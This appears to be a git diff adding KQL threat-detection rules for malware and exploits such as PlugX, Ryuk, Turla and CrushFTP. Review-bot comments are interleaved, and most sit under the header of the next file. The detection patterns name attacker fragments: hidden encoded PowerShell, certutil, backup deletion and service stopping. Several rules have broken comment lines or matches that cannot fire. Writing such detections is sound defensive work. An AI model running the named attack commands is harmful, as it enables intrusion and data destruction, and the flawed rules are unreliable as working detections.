+| where FolderPath endswith "\\ksproxy.ax" and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (not((InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\app-" and InitiatingProcessFolderPath contains "\\Discord.exe") or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Opera\\opera.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql
new file mode 100644
index 00000000..195a4faf
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql
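Review bot: The allow-list in the `where` clause pins every trusted directory to the C: drive (`startswith "C:\\Program Files\\"`, `startswith "C:\\Windows\\System32\\"`, and so on), so on a host whose system or program-files drive is not C: every legitimate DirectShow consumer of ksproxy.ax escapes the exclusion and becomes a medium-level hit. The compression-tool rule later in this same commit already uses the drive-agnostic form `contains ":\\Program Files\\"`; the same shape here, e.g. `InitiatingProcessFolderPath contains ":\\Windows\\System32\\"`, keeps the intent without the drive assumption. The stray blank `+` line between the Description and the MITRE Tactic lines also breaks the uniform header layout the other files in this batch use, which matters if anything parses these headers.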
@@ -0,0 +1,12 @@
+// Title: Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)
+// Author: Nisarg Suthar
+// Date: 2025-08-01
+// Level: high
+// Description: Detects suspicious child processes created by CrushFTP. It could be an indication of exploitation of a RCE vulnerability such as CVE-2025-54309.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1068, attack.t1190, cve.2025-54309, detection.emerging-threats
+// False Positives:
+// - Legitimate administrative command execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\crushftp.exe" and (((ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "net.exe" or ProcessCommandLine contains "net1.exe") and FolderPath endswith "\\cmd.exe") or (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "IEX" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "Hidden" and ProcessCommandLine contains "bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql
new file mode 100644
index 00000000..869374b7
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql
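Review bot: The PowerShell branch requires all four substrings `IEX`, `enc`, `Hidden` and `bypass` to appear together in one command line; a typical `-enc` payload carries the `IEX` inside the base64 blob, so the plaintext `IEX` requirement alone means the encoded case this branch appears to target will not match. If the upstream rule lists these as alternative indicators, the conversion should join them with `or` (`ProcessCommandLine contains "IEX" or ProcessCommandLine contains " -enc" or ...`), and the bare `contains "enc"` should then become the narrower `" -enc"` since `enc` alone also matches `-Encoding` and similar. If the conjunction is intentional, a sentence in the header saying the branch only covers the fully-verbose form would save the next reader the same question. I cannot see the Sigma source from this diff, so this should be checked against it rather than changed blindly.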
@@ -0,0 +1,13 @@
+// Title: Potential KamiKakaBot Activity - Winlogon Shell Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior
+// Date: 2024-03-22
+// Level: high
+// Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "-nop -w h" and RegistryValueData contains "$env" and RegistryValueData contains "explorer.exe" and RegistryValueData contains "Start-Process") and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql
new file mode 100644
index 00000000..7365fe39
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql
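Review bot: In DeviceRegistryEvents the `Shell` value name is carried in `RegistryValueName`, while `RegistryKey` holds only the key path ending in `\Winlogon`, so `RegistryKey endswith "...\\Winlogon\\Shell"` cannot match a value-set event and the rule is effectively dead in Advanced Hunting. This is the usual Sigma `TargetObject` to MDE split (key path plus value name); the condition should be `RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" and RegistryValueName =~ "Shell"`, with the `RegistryValueData` terms unchanged. Adding `ActionType == "RegistryValueSet"` would additionally keep key-creates and deletions out of the hits, though that is secondary to the match bug. The same split applies to any other registry rule produced by this converter, so it is worth fixing at the converter level.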
@@ -0,0 +1,14 @@
+// Title: Potential Pikabot Hollowing Activity
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-27
+// Level: high
+// Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries.
+The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\sndvol.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wwahost.exe") and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not((FolderPath endswith "\\sndvol.exe" and InitiatingProcessCommandLine contains "mmsys.cpl")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql
new file mode 100644
index 00000000..ae3bceec
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql
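Review bot: The second line of the multi-line description, `+The malware Pikabot has been seen to use this technique ...`, is emitted without the `//` prefix, so it is not a comment but bare text at the top of the query and the file will not parse in Advanced Hunting as committed. Every continuation line of a multi-line Sigma description needs its own prefix, i.e. `// The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries`. The same gap appears in the Serpent and pbpaste files in this commit, so it belongs in the converter; since the commit message advertises a more robust conversion script, a check that every line before the first table name starts with `//` or is blank would be a cheap regression guard.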
@@ -0,0 +1,10 @@
+// Title: Potential PlugX Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-06-12
+// Level: high
+// Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.s0013, attack.defense-evasion, attack.t1574.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\CamMute.exe" and (not((FolderPath contains "\\Lenovo\\Communication Utility\\" or FolderPath contains "\\Lenovo\\Communications Utility\\")))) or (FolderPath endswith "\\chrome_frame_helper.exe" and (not(FolderPath contains "\\Google\\Chrome\\application\\"))) or (FolderPath endswith "\\dvcemumanager.exe" and (not(FolderPath contains "\\Microsoft Device Emulator\\"))) or (FolderPath endswith "\\Gadget.exe" and (not(FolderPath contains "\\Windows Media Player\\"))) or (FolderPath endswith "\\hcc.exe" and (not(FolderPath contains "\\HTML Help Workshop\\"))) or (FolderPath endswith "\\hkcmd.exe" and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysNative\\" or FolderPath contains "\\SysWow64\\")))) or (FolderPath endswith "\\Mc.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit")))) or (FolderPath endswith "\\MsMpEng.exe" and (not((FolderPath contains "\\Microsoft Security Client\\" or FolderPath contains "\\Windows Defender\\" or FolderPath contains "\\AntiMalware\\")))) or (FolderPath endswith "\\msseces.exe" and (not((FolderPath contains "\\Microsoft Security Center\\" or FolderPath contains "\\Microsoft Security Client\\" or FolderPath contains "\\Microsoft Security Essentials\\")))) or (FolderPath endswith "\\OInfoP11.exe" and (not(FolderPath contains "\\Common Files\\Microsoft Shared\\"))) or (FolderPath endswith "\\OleView.exe" and
(not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit" or FolderPath contains "\\Windows Resource Kit\\")))) or (FolderPath endswith "\\rc.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit" or FolderPath contains "\\Windows Resource Kit\\" or FolderPath contains "\\Microsoft.NET\\"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql
new file mode 100644
index 00000000..71a90158
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Ryuk Ransomware Activity
+// Author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-12-16
+// Level: high
+// Description: Detects Ryuk ransomware activity
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "del /s /f /q c:\\" and ProcessCommandLine contains "*.bac" and ProcessCommandLine contains "*.bak" and ProcessCommandLine contains "*.bkf") or ((ProcessCommandLine contains "samss" or ProcessCommandLine contains "audioendpointbuilder" or ProcessCommandLine contains "unistoresvc_" or ProcessCommandLine contains "AcrSch2Svc") and (ProcessCommandLine contains " stop " and ProcessCommandLine contains " /y") and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" and ProcessCommandLine contains "C:\\users\\Public\\")
\ No newline at end of file
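Review bot: The Ryuk header labels the rule `MITRE Tactic: Privilege Escalation` and tags only T1547.001, yet two of the three branches of the `where` — the `del /s /f /q c:\` sweep of `*.bak`/`*.bkf` backups and the `net stop ... /y` of `samss`/`AcrSch2Svc` — are impact and defense-evasion behaviour with no corresponding tag, and only the Run-key branch is persistence. Across this batch the tactic field appears to be taken from the first Sigma tag rather than from the technique that the query actually matches, which will mislead anyone routing alerts by that field. Either carry the additional tags through (`attack.impact, attack.t1490, attack.t1489`, if the upstream rule has them) or derive the tactic from the technique-bearing tag in the converter.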
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql
new file mode 100644
index 00000000..d3d57bb1
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential SystemNightmare Exploitation Attempt
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-11
+// Level: critical
+// Description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "printnightmare.gentilkiwi.com" or ProcessCommandLine contains " /user:gentilguest " or ProcessCommandLine contains "Kiwi Legit Printer"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql b/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql
new file mode 100644
index 00000000..8ccccbdf
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql
@@ -0,0 +1,15 @@
+// Title: Serpent Backdoor Payload Execution Via Scheduled Task
+// Author: @kostastsale
+// Date: 2022-03-21
+// Level: high
+// Description: Detects post exploitation execution technique of the Serpent backdoor.
+According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method.
+It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.006, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "[System/EventID=" and ProcessCommandLine contains "/create" and ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/ec" and ProcessCommandLine contains "/so" and ProcessCommandLine contains "/tn run") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql b/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql
new file mode 100644
index 00000000..35978f87
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql
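Review bot: The description continuation lines `+According to Proofpoint, ...` and `+It creates a fictitious windows event ...` lack the `//` prefix, so they are parsed as query text rather than comments and the file is not valid KQL as committed. Prefixing each with `// ` restores the header; the converter should emit multi-line descriptions the same way it emits single-line ones. The query itself is fine, though `contains "/ec"` and `contains "/so"` are short tokens that also match `/ecdsa`-style arguments in unrelated command lines, which the surrounding six-way `and` keeps in check.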
@@ -0,0 +1,12 @@
+// Title: Small Sieve Malware CommandLine Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-19
+// Level: high
+// Description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith ".exe Platypus"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql
new file mode 100644
index 00000000..9b20865f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Sysmon as Execution Parent
+// Author: Florian Roth (Nextron Systems), Tim Shelton (fp werfault)
+// Date: 2022-11-10
+// Level: high
+// Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2022-41120, detection.emerging-threats
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\Sysmon.exe" or InitiatingProcessFolderPath endswith "\\Sysmon64.exe") and (not(((FolderPath contains ":\\Windows\\Sysmon.exe" or FolderPath contains ":\\Windows\\Sysmon64.exe" or FolderPath contains ":\\Windows\\System32\\conhost.exe" or FolderPath contains ":\\Windows\\System32\\WerFault.exe" or FolderPath contains ":\\Windows\\System32\\WerFaultSecure.exe" or FolderPath contains ":\\Windows\\System32\\wevtutil.exe" or FolderPath contains ":\\Windows\\SysWOW64\\wevtutil.exe") or isnull(FolderPath) or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe") and FolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql
new file mode 100644
index 00000000..1d44572a
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious VBScript UN2452 Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects suspicious inline VBScript keywords as used by UNC2452
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Execute" and ProcessCommandLine contains "CreateObject" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close" and ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion") and (not(ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql b/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql
new file mode 100644
index 00000000..e342028a
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql
@@ -0,0 +1,10 @@
+// Title: TAIDOOR RAT DLL Load
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-30
+// Level: high
+// Description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1055.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "dll,MyStart" or ProcessCommandLine contains "dll MyStart") or (ProcessCommandLine endswith " MyStart" and ProcessCommandLine contains "rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql b/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql
new file mode 100644
index 00000000..19ca8603
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql
@@ -0,0 +1,10 @@
+// Title: Turla Group Commands May 2020
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-26
+// Level: critical
+// Description: Detects commands used by Turla group as reported by ESET in May 2020
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.g0010, attack.execution, attack.t1059.001, attack.t1053.005, attack.t1027, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "tracert -h 10 yahoo.com" or ProcessCommandLine contains ".WSqmCons))|iex;" or ProcessCommandLine contains "Fr`omBa`se6`4Str`ing") or (ProcessCommandLine contains "@aol.co.uk" and ProcessCommandLine matches regex "net\\s+use\\s+https://docs.live.net")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql b/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql
new file mode 100644
index 00000000..996d9685
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql
@@ -0,0 +1,12 @@
+// Title: Winnti Malware HK University Campaign
+// Author: Florian Roth (Nextron Systems), Markus Neis
+// Date: 2020-02-01
+// Level: critical
+// Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath startswith "C:\\ProgramData\\DRM" and (InitiatingProcessFolderPath contains "C:\\Windows\\Temp" or InitiatingProcessFolderPath contains "\\hpqhvind.exe")) or (FolderPath endswith "\\wmplayer.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\DRM") or (FolderPath endswith "\\wmplayer.exe" and InitiatingProcessFolderPath endswith "\\Test.exe") or FolderPath =~ "C:\\ProgramData\\DRM\\CLR\\CLR.exe" or (FolderPath endswith "\\SearchFilterHost.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\DRM\\Windows")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql b/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql
new file mode 100644
index 00000000..2f7b9965
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql
@@ -0,0 +1,12 @@
+// Title: Winnti Pipemon Characteristics
+// Author: Florian Roth (Nextron Systems), oscd.community
+// Date: 2020-07-30
+// Level: critical
+// Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats
+// False Positives:
+// - Legitimate setups that use similar flags
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "setup0.exe -p" or (ProcessCommandLine contains "setup.exe" and (ProcessCommandLine endswith "-x:0" or ProcessCommandLine endswith "-x:1" or ProcessCommandLine endswith "-x:2"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql b/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql
new file mode 100644
index 00000000..213e1824
--- /dev/null
+++ b/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql
@@ -0,0 +1,10 @@
+// Title: Conti Volume Shadow Listing
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects a command used by conti to find volume shadow backups
+// MITRE Tactic: Resource Development
+// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "vssadmin list shadows" and ProcessCommandLine contains "log.txt"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql b/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql
new file mode 100644
index 00000000..06914cb0
--- /dev/null
+++ b/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql
@@ -0,0 +1,12 @@
+// Title: FoggyWeb Backdoor DLL Loading
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-09-27
+// Level: critical
+// Description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath =~ "C:\\Windows\\ADFS\\version.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql b/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql
new file mode 100644
index 00000000..4d0dd96b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql
@@ -0,0 +1,10 @@
+// Title: Formbook Process Creation
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-09-30
+// Level: high
+// Description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine endswith ".exe" and (InitiatingProcessCommandLine startswith "C:\\Windows\\System32\\" or InitiatingProcessCommandLine startswith "C:\\Windows\\SysWOW64\\")) and ((ProcessCommandLine contains "/c" and ProcessCommandLine contains "del" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "/c" and ProcessCommandLine contains "del" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\") or (ProcessCommandLine contains "/C" and ProcessCommandLine contains "type nul >" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\")) and ProcessCommandLine endswith ".exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql b/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql
new file mode 100644
index 00000000..c34e093f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql
@@ -0,0 +1,12 @@
+// Title: Mustang Panda Dropper
+// Author: Florian Roth (Nextron Systems), oscd.community
+// Date: 2019-10-30
+// Level: high
+// Description: Detects specific process parameters as used by Mustang Panda droppers
+// MITRE Tactic: Resource Development
+// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Temp\\wtask.exe /create" or ProcessCommandLine contains "%windir:~-3,1%%PUBLIC:~-9,1%" or ProcessCommandLine contains "/tn \"Security Script " or ProcessCommandLine contains "%windir:~-1,1%") or (ProcessCommandLine contains "/E:vbscript" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains ".txt" and ProcessCommandLine contains "/F")) or FolderPath endswith "Temp\\winwsh.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql b/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql
new file mode 100644
index 00000000..4a9cea7b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Word Cab File Write CVE-2021-40444
+// Author: Florian Roth (Nextron Systems), Sittikorn S
+// Date: 2021-09-10
+// Level: high
+// Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587, detection.emerging-threats
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\Windows\\INetCache" and FolderPath endswith ".cab") or (InitiatingProcessFolderPath endswith "\\winword.exe" and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".inf"))) and (not((FolderPath contains "AppData\\Local\\Temp" and FolderPath endswith "\\Content.inf" and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql b/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql
new file mode 100644
index 00000000..19069e8a
--- /dev/null
+++ b/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql
@@ -0,0 +1,17 @@
+// Title: Clipboard Data Collection Via Pbpaste
+// Author: Daniel Cortez
+// Date: 2024-07-30
+// Level: medium
+// Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout).
+The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands.
+It can also be used in shell scripts that may require clipboard content as input.
+Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information.
+Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
+
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.t1115, detection.threat-hunting
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/pbpaste"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql b/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql
new file mode 100644
index 00000000..9d43295f
--- /dev/null
+++ b/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql
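Review bot: Four description lines, from `+The utility is often used ...` through `+Use this rule to hunt ...`, are emitted without the `//` prefix, so the file as committed contains prose outside any comment and will not run as a query. Each needs a `// ` prefix, and this is the third file in the commit with the same multi-line-description defect, which points at the converter rather than the individual rule. Since the header itself tells the analyst to pivot on the parent process and command line, the hunt would be more usable with `| project Timestamp, DeviceName, InitiatingProcessFolderPath, InitiatingProcessCommandLine, ProcessCommandLine` appended, though that is optional.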
@@ -0,0 +1,12 @@
+// Title: Password Protected Compressed File Extraction Via 7Zip
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-10
+// Level: low
